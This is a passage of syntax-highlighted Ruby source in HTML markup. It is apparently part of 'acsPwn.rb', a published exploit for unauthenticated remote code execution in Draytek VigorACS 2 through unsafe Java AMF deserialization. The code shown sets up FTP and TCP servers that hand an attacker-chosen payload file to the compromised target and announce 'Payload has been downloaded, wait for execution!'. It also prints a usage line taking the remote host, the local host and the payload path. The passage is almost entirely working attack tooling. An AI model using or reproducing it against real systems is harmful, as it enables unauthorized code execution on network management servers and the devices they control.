class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-58\"><span class=\"crayon-i\">require<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;ftpd&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-59\"><span class=\"crayon-i\">require<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;tmpdir&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-60\"><span class=\"crayon-i\">require<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;net\/http&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-61\"><span class=\"crayon-i\">require<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;uri&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-63\"><span class=\"crayon-r\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">String<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-64\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">black<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;e[30m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-65\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">red<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;e[31m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-66\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">green<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;e[32m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-67\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">brown<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;e[33m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-68\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">blue<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-s\">&#8220;e[34m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-69\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">magenta<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;e[35m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-70\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cyan<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-s\">&#8220;e[36m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-71\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gray<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-s\">&#8220;e[37m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-72\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-73\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bg_black<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-s\">&#8220;e[40m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-74\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bg_red<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-s\">&#8220;e[41m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-75\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bg_green<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-s\">&#8220;e[42m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-76\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bg_brown<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-s\">&#8220;e[43m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-77\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bg_blue<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;e[44m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-78\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bg_magenta<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-s\">&#8220;e[45m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-79\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bg_cyan<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;e[46m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-80\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bg_gray<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;e[47m#{self}e[0m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-81\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-82\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bold<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-s\">&#8220;e[1m#{self}e[22m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-83\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">italic<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-s\">&#8220;e[3m#{self}e[23m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-84\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">underline<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;e[4m#{self}e[24m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-85\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">blink<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;e[5m#{self}e[25m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-86\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">reverse_color<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;e[7m#{self}e[27m&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-87\"><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-88\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-89\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-90\"><span class=\"crayon-c\"># FTP server (Windows)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-91\"><span class=\"crayon-r\">class<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Driver<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-92\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">initialize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">temp_dir<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-93\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">@temp_dir<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">temp<\/span><span class=\"crayon-sy\">_<\/span>dir<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-94\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-95\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-96\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">authenticate<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-97\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-c\"># actually the client hasn&#8217;t downloaded it yet, just logged in, but whatever<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-98\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;[+] Payload has been downloaded, wait for execution!&#8217;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">green<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">bold<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-99\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-r\">true<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-100\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-101\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-102\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file_system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-103\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">Ftpd<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">DiskFileSystem<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">@temp_dir<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-104\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-105\"><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-106\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-107\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ftp_start<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">temp_dir<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lhost<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-108\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">driver<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Driver<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">temp_dir<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-109\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Ftpd<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">FtpServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">driver<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-110\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">interface<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">lhost<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-111\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-112\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">start<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-113\"><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-114\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-115\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-116\"><span class=\"crayon-r\">def<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">tcp_start<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-117\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">pl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">File<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">binread<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-118\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">TCPServer<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">port<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-119\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">loop<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">do<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-120\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-t\">Thread<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">accept<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">client<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-121\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">client<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">pl<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-122\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">client<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-123\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Payload has been downloaded, wait for execution!&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">green<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">bold<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-124\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-125\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-126\"><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-127\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-128\"><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-129\"><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Draytek VigorACS 2 unauthenticated remote code execution (unsafe Java AMF deserialization)&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cyan<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">bold<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-130\"><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;CVE-TODO&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cyan<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">bold<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-131\"><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Tested on version 2.2.1 for Windows and Linux, earlier versions are likely vulnerable&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">cyan<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">bold<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-132\"><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;By Pedro Ribeiro (pedrib@gmail.com) \/ Agile Information Security&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">blue<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">bold<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-133\"><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-134\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5ad7c457c2e97650259174-135\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ARGV<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ARGV<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Linux&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARGV<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Windows&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-t\">File<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-t\">file<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ARGV<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ad7c457c2e97650259174-136\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-i\">puts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Usage: .\/acsPwn.rb &lt;rhost&gt; &lt;rport&gt; &lt;lhost&gt; &lt;Windows|Linux&gt; &lt;payload_path&gt; [ssl]&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">bold<\/span><\/div>\n<div 